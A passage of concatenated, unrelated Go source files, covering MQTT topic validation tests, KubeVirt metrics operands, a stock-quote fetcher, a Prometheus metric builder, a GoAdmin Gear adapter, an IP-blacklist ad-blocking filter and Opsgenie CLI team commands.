So(Validate("foo/#", true), ShouldBeNil)
So(Validate("foo/+", true), ShouldBeNil)
So(Validate("foo/+/bar", true), ShouldBeNil)
So(Validate("foo/#", false), ShouldEqual, errWildcardNotAllowed)
So(Validate("foo/+", false), ShouldEqual, errWildcardNotAllowed)
So(Validate("foo/+/bar", false), ShouldEqual, errWildcardNotAllowed)
So(Validate("foo/#bar", true), ShouldEqual, errInvalidWildcardLocation)
So(Validate("foo/+bar", true), ShouldEqual, errInvalidWildcardLocation)
So(Validate("foo/#/bar", true), ShouldEqual, errInvalidWildcardLocation)
})
}
|
package main
import (
"fmt"
"net"
)
func main() {
addr := net.JoinHostPort("0.0.0.0","0")
fmt.Println ("About to listen on ", addr)
ln, err := net.Listen("tcp4", addr)
if err != nil {
fmt.Println("Error, listening: ", err)
return
}
fmt.Println("Listening ", ln.Addr().String())
}
|
package operands
import (
"errors"
"os"
"reflect"
monitoringv1 "github.com/prometheus-operator/prometheus-operator/pkg/apis/monitoring/v1"
corev1 "k8s.io/api/core/v1"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/util/intstr"
"sigs.k8s.io/controller-runtime/pkg/client"
hcov1beta1 "github.com/kubevirt/hyperconverged-cluster-operator/pkg/apis/hco/v1beta1"
"github.com/kubevirt/hyperconverged-cluster-operator/pkg/controller/common"
"github.com/kubevirt/hyperconverged-cluster-operator/pkg/util"
hcoutil "github.com/kubevirt/hyperconverged-cluster-operator/pkg/util"
)
const (
operatorPortName = "http-metrics"
defaultOperatorName = "hyperconverged-cluster-operator"
operatorNameEnv = "OPERATOR_NAME"
metricsSuffix = "-operator-metrics"
alertRuleGroup = "kubevirt.hyperconverged.rules"
outOfBandUpdateAlert = "KubevirtHyperconvergedClusterOperatorCRModification"
)
type metricsServiceHandler genericOperand
func newMetricsServiceHandler(Client client.Client, Scheme *runtime.Scheme) *metricsServiceHandler {
return &metricsServiceHandler{
Client: Client,
Scheme: Scheme,
crType: "MetricsService",
removeExistingOwner: false,
setControllerReference: true,
hooks: &metricsServiceHooks{},
}
}
type metricsServiceHooks struct{}
func (h metricsServiceHooks) getFullCr(hc *hcov1beta1.HyperConverged) (client.Object, error) {
return NewMetricsService(hc, hc.Namespace), nil
}
func (h metricsServiceHooks) getEmptyCr() client.Object { return &corev1.Service{} }
func (h metricsServiceHooks) postFound(*common.HcoRequest, runtime.Object) error { return nil }
func (h metricsServiceHooks) getObjectMeta(cr runtime.Object) *metav1.ObjectMeta {
return &cr.(*corev1.Service).ObjectMeta
}
func (h metricsServiceHooks) reset( /* No implementation */ ) {}
func (h *metricsServiceHooks) updateCr(req *common.HcoRequest, Client client.Client, exists runtime.Object, required runtime.Object) (bool, bool, error) {
service, ok1 := required.(*corev1.Service)
found, ok2 := exists.(*corev1.Service)
if !ok1 || !ok2 {
return false, false, errors.New("can't convert to Service")
}
if !reflect.DeepEqual(found.Spec.Ports, service.Spec.Ports) ||
!reflect.DeepEqual(found.Spec.Selector, service.Spec.Selector) ||
!reflect.DeepEqual(found.Labels, service.Labels) {
if req.HCOTriggered {
req.Logger.Info("Updating existing metrics Service Spec to new opinionated values")
} else {
req.Logger.Info("Reconciling an externally updated metrics Service Spec to its opinionated values")
}
found.Spec.Ports = service.Spec.Ports
found.Spec.Selector = service.Spec.Selector
util.DeepCopyLabels(&service.ObjectMeta, &found.ObjectMeta)
err := Client.Update(req.Ctx, found)
if err != nil {
return false, false, err
}
return true, !req.HCOTriggered, nil
}
return false, false, nil
}
// NewMetricsService creates service for prometheus metrics
func NewMetricsService(hc *hcov1beta1.HyperConverged, namespace string) *corev1.Service {
// Add to the below struct any other metrics ports you want to expose.
servicePorts := []corev1.ServicePort{
{Port: hcoutil.MetricsPort, Name: operatorPortName, Protocol: v1.ProtocolTCP, TargetPort: intstr.IntOrString{Type: intstr.Int, IntVal: hcoutil.MetricsPort}},
}
operatorName := defaultOperatorName
val, ok := os.LookupEnv(operatorNameEnv)
if ok && val != "" {
operatorName = val
}
labelSelect := map[string]string{"name": operatorName}
spec := corev1.ServiceSpec{
Ports: servicePorts,
Selector: labelSelect,
}
return &corev1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: hc.Name + metricsSuffix,
Labels: getLabels(hc, hcoutil.AppComponentMonitoring),
Namespace: namespace,
},
Spec: spec,
}
}
type metricsServiceMonitorHandler genericOperand
func newMetricsServiceMonitorHandler(Client client.Client, Scheme *runtime.Scheme) *metricsServiceMonitorHandler {
return &metricsServiceMonitorHandler{
Client: Client,
Scheme: Scheme,
crType: "ServiceMonitor",
removeExistingOwner: false,
setControllerReference: true,
hooks: &metricsServiceMonitorHooks{},
}
}
type metricsServiceMonitorHooks struct{}
func (h metricsServiceMonitorHooks) getFullCr(hc *hcov1beta1.HyperConverged) (client.Object, error) {
return NewServiceMonitor(hc, hc.Namespace), nil
}
func (h metricsServiceMonitorHooks) getEmptyCr() client.Object {
return &monitoringv1.ServiceMonitor{}
}
func (h metricsServiceMonitorHooks) postFound(*common.HcoRequest, runtime.Object) error { return nil }
func (h metricsServiceMonitorHooks) getObjectMeta(cr runtime.Object) *metav1.ObjectMeta {
return &cr.(*monitoringv1.ServiceMonitor).ObjectMeta
}
func (h metricsServiceMonitorHooks) reset( /* No implementation */ ) {}
func (h *metricsServiceMonitorHooks) updateCr(req *common.HcoRequest, Client client.Client, exists runtime.Object, required runtime.Object) (bool, bool, error) {
monitor, ok1 := required.(*monitoringv1.ServiceMonitor)
found, ok2 := exists.(*monitoringv1.ServiceMonitor)
if !ok1 || !ok2 {
return false, false, errors.New("can't convert to ServiceMonitor")
}
if !reflect.DeepEqual(found.Spec, monitor.Spec) ||
!reflect.DeepEqual(found.Labels, monitor.Labels) {
if req.HCOTriggered {
req.Logger.Info("Updating existing metrics ServiceMonitor Spec to new opinionated values")
} else {
req.Logger.Info("Reconciling an externally updated metrics ServiceMonitor Spec to its opinionated values")
}
monitor.Spec.DeepCopyInto(&found.Spec)
util.DeepCopyLabels(&monitor.ObjectMeta, &found.ObjectMeta)
err := Client.Update(req.Ctx, found)
if err != nil {
return false, false, err
}
return true, !req.HCOTriggered, nil
}
return false, false, nil
}
// NewServiceMonitor creates ServiceMonitor resource to expose metrics endpoint
func NewServiceMonitor(hc *hcov1beta1.HyperConverged, namespace string) *monitoringv1.ServiceMonitor {
labels := getLabels(hc, hcoutil.AppComponentMonitoring)
spec := monitoringv1.ServiceMonitorSpec{
Selector: metav1.LabelSelector{
MatchLabels: labels,
},
Endpoints: []monitoringv1.Endpoint{{Port: operatorPortName}},
}
return &monitoringv1.ServiceMonitor{
ObjectMeta: metav1.ObjectMeta{
Name: hc.Name + metricsSuffix,
Labels: labels,
Namespace: namespace,
},
Spec: spec,
}
}
type monitoringPrometheusRuleHandler genericOperand
func newMonitoringPrometheusRuleHandler(Client client.Client, Scheme *runtime.Scheme) *monitoringPrometheusRuleHandler {
return &monitoringPrometheusRuleHandler{
Client: Client,
Scheme: Scheme,
crType: "PrometheusRule",
removeExistingOwner: false,
setControllerReference: true,
hooks: &prometheusRuleHooks{},
}
}
type prometheusRuleHooks struct{}
func (h prometheusRuleHooks) getFullCr(hc *hcov1beta1.HyperConverged) (client.Object, error) {
return NewPrometheusRule(hc, hc.Namespace), nil
}
func (h prometheusRuleHooks) getEmptyCr() client.Object { return &monitoringv1.PrometheusRule{} }
func (h prometheusRuleHooks) postFound(*common.HcoRequest, runtime.Object) error { return nil }
func (h prometheusRuleHooks) getObjectMeta(cr runtime.Object) *metav1.ObjectMeta {
return &cr.(*monitoringv1.PrometheusRule).ObjectMeta
}
func (h prometheusRuleHooks) reset( /* No implementation */ ) {}
func (h *prometheusRuleHooks) updateCr(req *common.HcoRequest, Client client.Client, exists runtime.Object, required runtime.Object) (bool, bool, error) {
rule, ok1 := required.(*monitoringv1.PrometheusRule)
found, ok2 := exists.(*monitoringv1.PrometheusRule)
if !ok1 || !ok2 {
return false, false, errors.New("can't convert to PrometheusRule")
}
if !reflect.DeepEqual(found.Spec, rule.Spec) ||
!reflect.DeepEqual(found.Labels, rule.Labels) {
if req.HCOTriggered {
req.Logger.Info("Updating existing PrometheusRule Spec to new opinionated values")
} else {
req.Logger.Info("Reconciling an externally updated PrometheusRule Spec to its opinionated values")
}
rule.Spec.DeepCopyInto(&found.Spec)
util.DeepCopyLabels(&rule.ObjectMeta, &found.ObjectMeta)
err := Client.Update(req.Ctx, found)
if err != nil {
return false, false, err
}
return true, !req.HCOTriggered, nil
}
return false, false, nil
}
// NewPrometheusRule creates PrometheusRule resource to define alert rules
func NewPrometheusRule(hc *hcov1beta1.HyperConverged, namespace string) *monitoringv1.PrometheusRule {
return &monitoringv1.PrometheusRule{
TypeMeta: metav1.TypeMeta{
APIVersion: monitoringv1.SchemeGroupVersion.String(),
Kind: "PrometheusRule",
},
ObjectMeta: metav1.ObjectMeta{
Name: hc.Name + "-prometheus-rule",
Labels: getLabels(hc, hcoutil.AppComponentMonitoring),
Namespace: namespace,
},
Spec: *NewPrometheusRuleSpec(),
}
}
// NewPrometheusRuleSpec creates PrometheusRuleSpec for alert rules
func NewPrometheusRuleSpec() *monitoringv1.PrometheusRuleSpec {
return &monitoringv1.PrometheusRuleSpec{
Groups: []monitoringv1.RuleGroup{{
Name: alertRuleGroup,
Rules: []monitoringv1.Rule{{
Alert: outOfBandUpdateAlert,
Expr: intstr.FromString("sum by(component_name) ((round(increase(kubevirt_hco_out_of_band_modifications_count[10m]))>0 and kubevirt_hco_out_of_band_modifications_count offset 10m) or (kubevirt_hco_out_of_band_modifications_count != 0 unless kubevirt_hco_out_of_band_modifications_count offset 10m))"),
Annotations: map[string]string{
"description": "Out-of-band modification for {{ $labels.component_name }} .",
"summary": "{{ $value }} out-of-band CR modifications were detected in the last 10 minutes.",
},
Labels: map[string]string{
"severity": "warning",
},
}},
}},
}
}
|
package mop
func NewQuotes(market *Market, profile *Profile) *Quotes {
return &Quotes{
market: market,
profile: profile,
errors: ``,
}
}
func (quotes *Quotes) Fetch() (self *Quotes) {
qs, _ := quotes.market.OnDemand.Quote(quotes.profile.Tickers,
[]string{"bid", "fiftyTwoWkHigh", "dividendRateAnnual", "dividendYieldAnnual", "fiftyTwoWkLow", "avgVolume", "ask"})
quotes.stocks = make([]Stock, len(qs.Results))
for i, q := range qs.Results {
quotes.stocks[i].Ticker = q.Symbol
quotes.stocks[i].LastTrade = ToString(q.LastPrice, 2)
quotes.stocks[i].Change = ToString(q.NetChange, 2)
quotes.stocks[i].ChangePct = ToString(q.PercentChange, 2)
quotes.stocks[i].Open = ToString(q.Open, 2)
quotes.stocks[i].High = ToString(q.High, 2)
quotes.stocks[i].Low = ToString(q.Low, 2)
quotes.stocks[i].Low52 = ToString(q.FiftyTwoWkLow, 2)
quotes.stocks[i].High52 = ToString(q.FiftyTwoWkHigh, 2)
quotes.stocks[i].Volume = IntToString(q.Volume)
quotes.stocks[i].AvgVolume = IntToString(q.AvgVolume)
quotes.stocks[i].PeRatio = ToString(q.LastPrice, 2)
quotes.stocks[i].PeRatioX = ToString(q.LastPrice, 2)
quotes.stocks[i].Dividend = NAString(q.DividendRateAnnual)
quotes.stocks[i].Yield = NAString(q.DividendYieldAnnual)
quotes.stocks[i].MarketCap = ToString(q.LastPrice, 2)
quotes.stocks[i].MarketCapX = ToString(q.LastPrice, 2)
quotes.stocks[i].Advancing = (q.NetChange > 0)
//fmt.Println(q.DividendRateAnnual)
}
//fmt.Println("symbols", qs)
return quotes
}
func NAString(field string) string {
if len(field) == 0 {
return "N/A"
}
return field
}
func (quotes *Quotes) Ok() (bool, string) {
return quotes.errors == ``, quotes.errors
}
func (quotes *Quotes) AddTickers(tickers []string) (added int, err error) {
if added, err = quotes.profile.AddTickers(tickers); err == nil && added > 0 {
quotes.stocks = nil // Force fetch.
}
return
}
func (quotes *Quotes) RemoveTickers(tickers []string) (removed int, err error) {
if removed, err = quotes.profile.RemoveTickers(tickers); err == nil && removed > 0 {
quotes.stocks = nil // Force fetch.
}
return
}
func (quotes *Quotes) isReady() bool {
return (quotes.stocks == nil || !quotes.market.IsClosed) && len(quotes.profile.Tickers) > 0
}
|
package builder
import (
"errors"
"fmt"
"sort"
"github.com/prometheus/client_golang/prometheus"
)
// MetricBuilder is the basic metric type that must be used by any potential metric added to
// the system. It allows user to create a prom collector which will be used to push.
type MetricBuilder struct {
// labels contains the list of all label keys that the collector object will have.
labels []string
// labelKeyValues stores values for label keys that will be added to the metric
// Prometheus metrics are designed as follows:
// metric_name {metric_label_key1:value1, key2:value2, ....} metric_value
// labelKeyValues stores the key/value pairs of the Prometheus metric.
labelKeyValues map[string]string
// desc describes the metric that is being created. This field will be shown on Prometheus
// dashboard as a help text.
desc string
// name describes the name of the metric that needs to be pushed.
name string
// value stores the value of the metric that needs to be pushed. Collected from the installer.
value float64
// buckets keeps a list of bucket values that will be used during the creation of a Histogram
// object.
buckets []float64
// metricType defines what type of a collector object should the PromCollector function return.
metricType MetricType
}
// MetricOpts contains the properties that are required to create a MetricBuilder object.
type MetricOpts struct {
// labels contains the list of all label keys that the collector object will have.
Labels []string
// desc describes the metric that is being created. This field will be shown on Prometheus
// dashboard as a help text.
Desc string
// name describes the name of the metric that needs to be pushed.
Name string
// buckets keeps a list of bucket values that will be used during the creation of a Histogram
// object.
Buckets []float64
// metricType defines what type of a collector object should the PromCollector function return.
MetricType MetricType
}
// MetricType defines what types of metrics can be created. Restricted by the types of the Prometheus
// Collector types.
type MetricType string
const (
// Histogram denotes that the type of the collector object should be a Prometheus Histogram.
Histogram MetricType = "Histogram"
// Counter denotes that the type of the collector object should be a Prometheus Counter.
Counter MetricType = "Counter"
)
// PromCollector function creates the required prometheus collector object with the values
// it has in the MetricBuilder calling object.
func (m MetricBuilder) PromCollector() (prometheus.Collector, error) {
switch m.metricType {
case Counter:
return m.buildCounter(), nil
case Histogram:
return m.buildHistogram(), nil
default:
return nil, fmt.Errorf(`invalid metric builder type "%s". cannot create collector`, m.metricType)
}
}
// buildCounter returns a prometheus counter object with the value and labels set
// in the MetricBuilder object.
func (m *MetricBuilder) buildCounter() prometheus.Collector {
collector := prometheus.NewCounter(
prometheus.CounterOpts{
Name: m.name,
Help: m.desc,
ConstLabels: m.labelKeyValues,
},
)
collector.Add(m.value)
return collector
}
// buildHistogram returns a prometheus Histogram object with the value, labels and buckets set
// in the MetricBuilder object.
func (m *MetricBuilder) buildHistogram() prometheus.Collector {
collector := prometheus.NewHistogram(
prometheus.HistogramOpts{
Name: m.name,
Help: m.desc,
Buckets: m.buckets,
ConstLabels: m.labelKeyValues,
},
)
collector.Observe(m.value)
return collector
}
// NewMetricBuilder creates a new MetricBuilder object with the default values for the field.
func NewMetricBuilder(opts MetricOpts, value float64, labelKeyValues map[string]string) (*MetricBuilder, error) {
if opts.Labels == nil {
return nil, errors.New("labels cannot be empty")
}
if labelKeyValues == nil {
labelKeyValues = make(map[string]string)
}
if opts.Name == "" {
return nil, errors.New("name cannot be empty")
}
if opts.MetricType == "" {
return nil, errors.New("metricType cannot be empty")
}
sort.Strings(opts.Labels)
return &MetricBuilder{
labels: opts.Labels,
name: opts.Name,
metricType: opts.MetricType,
desc: opts.Desc,
buckets: opts.Buckets,
value: value,
labelKeyValues: labelKeyValues,
}, nil
}
// SetValue is a setter function that assigns value to the metric builder.
func (m *MetricBuilder) SetValue(value float64) {
m.value = value
}
// AddLabelValue takes in a key and value and sets it to the map in metric builder.
func (m *MetricBuilder) AddLabelValue(key string, value string) error {
if i := sort.SearchStrings(m.labels, key); i < len(m.labels) && m.labels[i] == key {
m.labelKeyValues[key] = value
return nil
}
return fmt.Errorf("key %q not in metricBuilder labels %v", key, m.labels)
}
|
package main
import (
"fmt"
)
/*
GenDisplaceFn is function generate the
*/
func GenDisplaceFn(a, v0, s0 float64) func(float64) float64 {
return func(t float64) float64 {
return (0.5)*a*t*t + v0*t + s0
}
}
func main() {
var a, v0, s0, t float64
fmt.Println("Enter the initial values...")
fmt.Printf("acceleration : ")
fmt.Scanln(&a)
fmt.Printf("initial velocity : ")
fmt.Scanln(&v0)
fmt.Printf("intial displacement : ")
fmt.Scanln(&s0)
fn := GenDisplaceFn(a, v0, s0)
for true {
fmt.Println("Enter the value of time : \nOr enter -1 to quit!")
fmt.Scanln(&t)
if t == -1 || t < 0 {
break
}
fmt.Printf("displacement : ")
fmt.Println(fn(t))
}
fmt.Println("Thank you!")
}
|
package main
import (
ussd "../ussd"
"log"
"net/http"
)
func main() {
// service binding
mux := http.NewServeMux()
ussd.RegisterService(mux)
log.Println("hub is started...")
//http.ListenAndServeTLS(":4002", "cert.pem", "key.pem", mux)
http.ListenAndServe(":8080", mux)
log.Println("hub is stopped.")
}
|
/***
# File Name: ../../adapter/gear/gear.go
# Author: eavesmy
# Email: eavesmy@gmail.com
# Created Time: 2021年06月03日 星期四 19时05分06秒
***/
package gear
import (
"bytes"
"errors"
"net/http"
"net/url"
"regexp"
"strings"
"github.com/GoAdminGroup/go-admin/adapter"
"github.com/GoAdminGroup/go-admin/context"
"github.com/GoAdminGroup/go-admin/engine"
"github.com/GoAdminGroup/go-admin/modules/config"
"github.com/GoAdminGroup/go-admin/modules/utils"
"github.com/GoAdminGroup/go-admin/plugins"
"github.com/GoAdminGroup/go-admin/plugins/admin/models"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/constant"
"github.com/GoAdminGroup/go-admin/template/types"
"github.com/teambition/gear"
)
// Gear structure value is a Gin GoAdmin adapter.
type Gear struct {
adapter.BaseAdapter
ctx *gear.Context
app *gear.App
router *gear.Router
}
func init() {
engine.Register(new(Gear))
}
// User implements the method Adapter.User.
func (gears *Gear) User(ctx interface{}) (models.UserModel, bool) {
return gears.GetUser(ctx, gears)
}
// Use implements the method Adapter.Use.
func (gears *Gear) Use(app interface{}, plugs []plugins.Plugin) error {
return gears.GetUse(app, plugs, gears)
}
// Content implements the method Adapter.Content.
func (gears *Gear) Content(ctx interface{}, getPanelFn types.GetPanelFn, fn context.NodeProcessor, btns ...types.Button) {
gears.GetContent(ctx, getPanelFn, gears, btns, fn)
}
type HandlerFunc func(ctx *gear.Context) (types.Panel, error)
func Content(handler HandlerFunc) gear.Middleware {
return func(ctx *gear.Context) error {
engine.Content(ctx, func(ctx interface{}) (types.Panel, error) {
return handler(ctx.(*gear.Context))
})
return nil
}
}
// SetApp implements the method Adapter.SetApp.
func (gears *Gear) SetApp(app interface{}) error {
gears.app = app.(*gear.App)
gears.router = gear.NewRouter()
var (
eng *gear.App
ok bool
)
if eng, ok = app.(*gear.App); !ok {
return errors.New("beego adapter SetApp: wrong parameter")
}
gears.app = eng
return nil
}
// AddHandler implements the method Adapter.AddHandler.
func (gears *Gear) AddHandler(method, path string, handlers context.Handlers) {
if gears.router == nil {
gears.router = gear.NewRouter()
}
gears.router.Handle(strings.ToUpper(method), path, func(c *gear.Context) error {
ctx := context.NewContext(c.Req)
newPath := path
reg1 := regexp.MustCompile(":(.*?)/")
reg2 := regexp.MustCompile(":(.*?)$")
params := reg1.FindAllString(newPath, -1)
newPath = reg1.ReplaceAllString(newPath, "")
params = append(params, reg2.FindAllString(newPath, -1)...)
for _, param := range params {
p := utils.ReplaceAll(param, ":", "", "/", "")
if c.Req.URL.RawQuery == "" {
c.Req.URL.RawQuery += p + "=" + c.Param(p)
} else {
c.Req.URL.RawQuery += "&" + p + "=" + c.Param(p)
}
}
ctx.SetHandlers(handlers).Next()
for key, head := range ctx.Response.Header {
c.Res.Header().Add(key, head[0])
}
if ctx.Response.Body != nil {
buf := new(bytes.Buffer)
_, _ = buf.ReadFrom(ctx.Response.Body)
return c.End(ctx.Response.StatusCode, buf.Bytes())
}
c.Status(ctx.Response.StatusCode)
return nil
})
gears.app.UseHandler(gears.router)
}
// Name implements the method Adapter.Name.
func (*Gear) Name() string {
return "gear"
}
// SetContext implements the method Adapter.SetContext.
func (*Gear) SetContext(contextInterface interface{}) adapter.WebFrameWork {
var (
ctx *gear.Context
ok bool
)
if ctx, ok = contextInterface.(*gear.Context); !ok {
panic("gear adapter SetContext: wrong parameter")
}
return &Gear{ctx: ctx}
}
// Redirect implements the method Adapter.Redirect.
func (gears *Gear) Redirect() {
gears.ctx.Redirect(config.Url(config.GetLoginUrl()))
}
// SetContentType implements the method Adapter.SetContentType.
func (gears *Gear) SetContentType() {
gears.ctx.Res.Header().Set("Content-Type", gears.HTMLContentType())
}
// Write implements the method Adapter.Write.
func (gears *Gear) Write(body []byte) {
gears.ctx.End(http.StatusOK, body)
}
// GetCookie implements the method Adapter.GetCookie.
func (gears *Gear) GetCookie() (string, error) {
return gears.ctx.Cookies.Get(gears.CookieKey())
}
// Lang implements the method Adapter.Lang.
func (gears *Gear) Lang() string {
return gears.ctx.Req.URL.Query().Get("__ga_lang")
}
// Path implements the method Adapter.Path.
func (gears *Gear) Path() string {
return gears.ctx.Req.URL.Path
}
// Method implements the method Adapter.Method.
func (gears *Gear) Method() string {
return gears.ctx.Req.Method
}
// FormParam implements the method Adapter.FormParam.
func (gears *Gear) FormParam() url.Values {
_ = gears.ctx.Req.ParseMultipartForm(32 << 20)
return gears.ctx.Req.PostForm
}
// IsPjax implements the method Adapter.IsPjax.
func (gears *Gear) IsPjax() bool {
return gears.ctx.Req.Header.Get(constant.PjaxHeader) == "true"
}
// Query implements the method Adapter.Query.
func (gears *Gear) Query() url.Values {
return gears.ctx.Req.URL.Query()
}
|
package filters
import (
"net"
"github.com/jlorgal/odor/odor"
)
// AdBlocking filter.
type AdBlocking struct {
blacklist []*net.IPNet
}
// NewAdBlocking creates a Malware filter
func NewAdBlocking(config *odor.Config) (*AdBlocking, error) {
blacklist, err := odor.GetBlacklist("adBlocking", config)
return &AdBlocking{blacklist: blacklist}, err
}
// Request filters ingress packets.
func (a *AdBlocking) Request(context *odor.Context) odor.FilterAction {
if context.Profile == nil || !context.Profile.AdBlocking {
return odor.Accept
}
if ipv4 := odor.GetIPv4Layer(context.Packet); ipv4 != nil {
if odor.IsBlacklistedIP(a.blacklist, ipv4.DstIP) {
return odor.Drop
}
}
return odor.Accept
}
// Response filters egress packets.
func (a *AdBlocking) Response(context *odor.Context) odor.FilterAction {
return odor.Accept
}
|
package command
import (
"context"
"github.com/opsgenie/opsgenie-go-sdk-v2/team"
gcli "github.com/urfave/cli"
"os"
"strconv"
"strings"
)
func NewTeamClient(c *gcli.Context) *team.Client {
teamCli, cliErr := team.NewClient(getConfigurations(c))
if cliErr != nil {
message := "Can not create the team client. " + cliErr.Error()
printMessage(INFO,message)
os.Exit(1)
}
printMessage(DEBUG,"Team Client created.")
return teamCli
}
func CreateTeamAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
createTeamRequest := &team.CreateTeamRequest{}
if teamName, ok := getVal("name",c );ok {
createTeamRequest.Name = teamName
}
if desc, ok := getVal("desc", c); ok {
createTeamRequest.Description = desc
}
userName, _ := getVal("userName",c)
userID, _ := getVal("userId",c)
createTeamRequest.Members = []team.Member{
{
User: team.User{
Username: userName,
ID: userID,
},
},
}
if role, ok := getVal("role", c);ok {
createTeamRequest.Members[0].Role = role
}
printResponse(createTeamRequest, nil, c)
resp, err := teamCli.Create(context.Background(), createTeamRequest)
printResponse(resp, err, c)
}
func UpdateTeamAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
updateTeamRequest := &team.UpdateTeamRequest{}
if teamName, ok := getVal("name",c );ok {
updateTeamRequest.Name = teamName
}
if desc, ok := getVal("desc", c); ok {
updateTeamRequest.Description = desc
}
if ID, ok := getVal("id", c); ok {
updateTeamRequest.Id = ID
}
userName, _ := getVal("userName",c)
userID, _ := getVal("userId",c)
updateTeamRequest.Members = []team.Member{
{
User: team.User{
Username: userName,
ID: userID,
},
},
}
if role, ok := getVal("role", c);ok {
updateTeamRequest.Members[0].Role = role
}
resp, err := teamCli.Update(context.Background(), updateTeamRequest)
printResponse(resp, err, c)
}
func GetTeamAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
getTeamRequest := &team.GetTeamRequest{}
if teamName, ok := getVal("name", c); ok {
getTeamRequest = &team.GetTeamRequest{
IdentifierType: team.Name,
IdentifierValue: teamName,
}
} else if teamID, ok:= getVal("id", c); ok{
getTeamRequest = &team.GetTeamRequest{
IdentifierType: team.Id,
IdentifierValue: teamID,
}
}
resp, err := teamCli.Get(context.Background(), getTeamRequest)
printResponse(resp, err, c)
}
func DeleteTeamAction(c *gcli.Context){
teamCli := NewTeamClient(c)
var deleteTeamRequest *team.DeleteTeamRequest
if teamName, ok := getVal("name", c); ok {
deleteTeamRequest = &team.DeleteTeamRequest{
IdentifierType: team.Name,
IdentifierValue: teamName,
}
} else if teamID, ok:= getVal("id", c); ok{
deleteTeamRequest = &team.DeleteTeamRequest{
IdentifierType: team.Id,
IdentifierValue: teamID,
}
}
resp, err := teamCli.Delete(context.Background(), deleteTeamRequest)
printResponse(resp, err, c)
}
func ListTeamsAction(c *gcli.Context){
teamCli := NewTeamClient(c)
resp, err := teamCli.List(context.Background(), &team.ListTeamRequest{})
printResponse(resp, err, c)
}
func ListRolesAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
listTeamRolesRequest := &team.ListTeamRoleRequest{}
if teamName, ok := getVal("name",c); ok {
listTeamRolesRequest = &team.ListTeamRoleRequest{
TeamIdentifierType: team.Name,
TeamIdentifierValue: teamName,
}
} else if teamID, ok := getVal("id", c); ok {
listTeamRolesRequest = &team.ListTeamRoleRequest{
TeamIdentifierType: team.Id,
TeamIdentifierValue: teamID,
}
}
resp, err := teamCli.ListRole(context.Background(), listTeamRolesRequest)
printResponse(resp, err, c)
}
func CreateRoleAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
createTeamRoleRequest := &team.CreateTeamRoleRequest{}
if teamName, ok := getVal("name",c); ok {
createTeamRoleRequest.TeamIdentifierType = team.Name
createTeamRoleRequest.TeamIdentifierValue = teamName
} else if teamID, ok := getVal("id", c); ok {
createTeamRoleRequest.TeamIdentifierType = team.Id
createTeamRoleRequest.TeamIdentifierValue = teamID
}
if roleName, ok := getVal("roleName",c); ok {
createTeamRoleRequest.Name = roleName
}
roleRights := []team.Right{}
granted := true
if rightsArgVal, ok := getVal("rights", c); ok {
rights := strings.Split(rightsArgVal, ",")
for _, right := range rights{
roleRights = append(roleRights, team.Right{
Right: right,
Granted: &granted,
})
}
}
createTeamRoleRequest.Rights = roleRights
resp, err := teamCli.CreateRole(context.Background(), createTeamRoleRequest)
printResponse(resp, err, c)
}
func ListRoleRightsAction(c *gcli.Context){
type right struct {
Name string `json:"name"`
Description string `json:"description"`
Category string `json:"category"`
}
roleRights := []right{
{
Name: "manage-members",
Description: "Manage Team Members",
Category: "Member Management",
},
{
Name: "edit-team-roles",
Description: "reate/Update Team Roles",
Category: "Member Management",
},
{
Name: "delete-team-roles",
Description: "Delete Team Roles",
Category: "Member Management",
},
{
Name: "access-member-profiles",
Description: "Access Profiles of Team Members",
Category: "Member Management",
},
{
Name: "edit-member-profiles",
Description: "Edit Profiles of Team Members",
Category: "Member Management",
},
{
Name: "edit-routing-rules",
Description: "Create/Update Routing Rules",
Category: "Configurations",
},
{
Name: "delete-routing-rules",
Description: "Delete Routing Rules",
Category: "Configurations",
},
{
Name: "edit-escalations",
Description: "Create/Update Escalations",
Category: "Configurations",
},
{
Name: "delete-escalations",
Description: "Delete Escalations",
Category: "Configurations",
},
{
Name: "edit-schedules",
Description: "Create/Update Schedules",
Category: "Configurations",
},
{
Name: "delete-schedules",
Description: "Delete Schedules",
Category: "Configurations",
},
{
Name: "edit-integrations",
Description: "Create/Update Integrations",
Category: "Configurations",
},
{
Name: "delete-integrations",
Description: "Delete Integrations",
Category: "Configurations",
},
{
Name: "edit-automation-actions",
Description: "Create/Update Automation Actions",
Category: "Configurations",
},
{
Name: "delete-automation-actions",
Description: "Delete Automation Actions",
Category: "Configurations",
},
{
Name: "edit-heartbeats",
Description: "Create/Update Heartbeats",
Category: "Configurations",
},
{
Name: "delete-heartbeats",
Description: "Delete Heartbeats",
Category: "Configurations",
},
{
Name: "edit-policies",
Description: "Create/Update Policies",
Category: "Configurations",
},
{
Name: "delete-policies",
Description: "Delete Policies",
Category: "Configurations",
},
{
Name: "edit-maintenance",
Description: "Create/Update Maintenance",
Category: "Configurations",
},
{
Name: "delete-maintenance",
Description: "Delete Maintenance",
Category: "Configurations",
},
{
Name: "access-reports",
Description: "Access Reports",
Category: "Configurations",
},
{
Name: "edit-services",
Description: "Create/Update Services",
Category: "Incident Configurations",
},
{
Name: "delete-services",
Description: "Delete Services",
Category: "Incident Configurations",
},
{
Name: "edit-rooms",
Description: "Create/Update Rooms",
Category: "Incident Configurations",
},
{
Name: "delete-rooms",
Description: "Delete Rooms",
Category: "Incident Configurations",
},
{
Name: "subscription-to-services",
Description: "Subscription To Services",
Category: "Incident Configurations",
},
}
printResponse(struct {
Rights []right `json:"rights"`
}{roleRights}, nil , c)
}
func ListTeamRoutingRulesAction(c *gcli.Context) {
teamCli:= NewTeamClient(c)
listRoutingRulesRequest := &team.ListRoutingRulesRequest{}
if teamName, ok := getVal("name",c); ok {
listRoutingRulesRequest = &team.ListRoutingRulesRequest{
TeamIdentifierType: team.Name,
TeamIdentifierValue: teamName,
}
} else if teamID, ok := getVal("id", c); ok {
listRoutingRulesRequest = &team.ListRoutingRulesRequest{
TeamIdentifierType: team.Id,
TeamIdentifierValue: teamID,
}
}
resp, err := teamCli.ListRoutingRules(context.Background(), listRoutingRulesRequest)
printResponse(resp, err, c)
}
func DeleteTeamRoutingRuleAction(c *gcli.Context) {
teamCli := NewTeamClient(c)
